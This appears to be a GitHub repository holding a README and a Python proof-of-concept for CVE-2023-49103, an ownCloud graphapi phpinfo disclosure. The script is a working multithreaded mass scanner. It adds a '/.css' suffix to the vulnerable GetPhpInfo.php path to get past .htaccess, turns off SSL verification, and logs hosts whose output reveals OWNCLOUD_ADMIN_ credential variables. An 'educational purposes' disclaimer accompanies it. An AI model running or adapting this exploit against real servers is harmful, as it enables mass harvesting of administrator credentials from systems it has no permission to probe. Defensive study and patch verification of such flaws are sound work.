├── README.md
└── exploit.py

/README.md:
--------------------------------------------------------------------------------
# CVE-2023-49103
PoC for CVE-2023-49103 (ownCloud graphapi phpinfo disclosure).

## Overview
This Python script efficiently processes a large list of URLs to check for the presence of `phpinfo()` output. It uses multi-threading to handle many URLs concurrently, which significantly speeds up the process, and it displays a real-time progress bar so you can track progress visually.

To trigger the vulnerability, access to the phpinfo() URL isn't enough: you also need to bypass `.htaccess` (thanks to Rapid7 for the insight). Here, this is done by appending `/.css` to the URL.

## Requirements
- Python 3.x
- `requests`
- `urllib3`
- `colorama`
- `alive-progress`
- `concurrent.futures` (part of the standard library in Python 3)

## Installation
1. Ensure you have Python 3 installed on your system.
2. Clone this repository or download the script.
3. Install the required Python packages:

`pip install requests urllib3 colorama alive-progress`

## Usage
To use the script, you need a text file containing a list of URLs to check, with each URL on a new line.

## Prepare your URL list

Create a text file (e.g., `urls.txt`) with each URL on a new line (see the example at the end of this README).

## Run the script

Run the script with the following command, replacing `input_file.txt` with your file of URLs and `output_file.txt` with the desired output file name:

`python exploit.py -t input_file.txt -o output_file.txt`

## View Results

The script processes each URL and writes the results to the specified output file. URLs that return valid `phpinfo()` output are logged in this file.

## Contributions
Feel free to fork this repository or submit pull requests with improvements.

Thanks @random-robbie for the PR <3

## Disclaimer

I originally wrote this script just for fun (I was bored and wanted to try my hand at multithreading) and not for any malicious purposes. Do the same: test on YOUR own instances, not on your neighbor's.
This script is ONLY for educational purposes, of course.
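## Example URL list

The check URLs are built from each base URL in the list, so entries should be bare instance URLs without a trailing path. A hypothetical `urls.txt` (example hosts, not real targets) could look like:

`https://cloud.example.com`
`https://owncloud.example.org`

For each entry, the script probes both `<base>/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css` and `<base>/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css`.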
--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
import argparse
import queue
from alive_progress import alive_bar

# Suppress warnings about unverified HTTPS requests (SSL verification is disabled below)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_phpinfo(url):
    """Return True if the URL serves phpinfo() output exposing OWNCLOUD_ADMIN_* variables."""
    try:
        # Bypass SSL verification; the timeout keeps a hung host from stalling a worker thread
        response = requests.get(url, verify=False, timeout=10)
        if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
            return True
    except requests.RequestException:
        pass
    return False

def process_urls(url_queue, output_file, update_bar):
    with open(output_file, 'a') as out:
        while True:
            url = url_queue.get()
            if url is None:  # Sentinel value to indicate completion
                url_queue.task_done()
                break
            try:
                if check_phpinfo(url):
                    print(Fore.GREEN + "Valid: " + url + Style.RESET_ALL)
                    out.write(url + '\n')
                else:
                    print(Fore.RED + "Invalid: " + url + Style.RESET_ALL)
            except Exception as e:
                print(Fore.YELLOW + f"Error processing {url}: {e}" + Style.RESET_ALL)
            finally:
                url_queue.task_done()
                update_bar()  # Update the progress bar

def process_file(file_path, output_file):
    urls = []
    with open(file_path, 'r') as file:
        for line in file:
            base_url = line.strip()
            # Append both URL variants for each base URL
            urls.append(base_url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
            urls.append(base_url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")

    url_queue = queue.Queue()
    num_workers = min(100, len(urls))  # Adjust based on your system's capabilities

    with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
        with ThreadPoolExecutor(max_workers=num_workers) as executor:
            # Start worker threads
            for _ in range(num_workers):
                executor.submit(process_urls, url_queue, output_file, bar)

            # Read URLs and add them to the queue
            for url in urls:
                url_queue.put(url)

            # Add sentinel values (one per worker) to indicate completion
            for _ in range(num_workers):
                url_queue.put(None)

            url_queue.join()  # Wait for all tasks to be completed


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Check a list of URLs for CVE-2023-49103 phpinfo exposure.')
    parser.add_argument('-t', '--target', required=True, help='Input file with URLs')
    parser.add_argument('-o', '--output', required=True, help='Output file for valid URLs')

    args = parser.parse_args()

    process_file(args.target, args.output)
--------------------------------------------------------------------------------
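For checking a single instance you control (per the disclaimer above), a minimal sketch that reuses `check_phpinfo` from `exploit.py` without the queue/thread machinery might look like this; the host below is hypothetical:

```python
# Minimal single-target sketch: reuses check_phpinfo from exploit.py.
# Assumes exploit.py is in the current directory; the host is a hypothetical
# instance you own, not a real target.
from exploit import check_phpinfo

base = "https://owncloud.example.com"
for prefix in ("/owncloud", ""):
    url = base + prefix + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
    print(url, "->", "vulnerable" if check_phpinfo(url) else "not vulnerable")
```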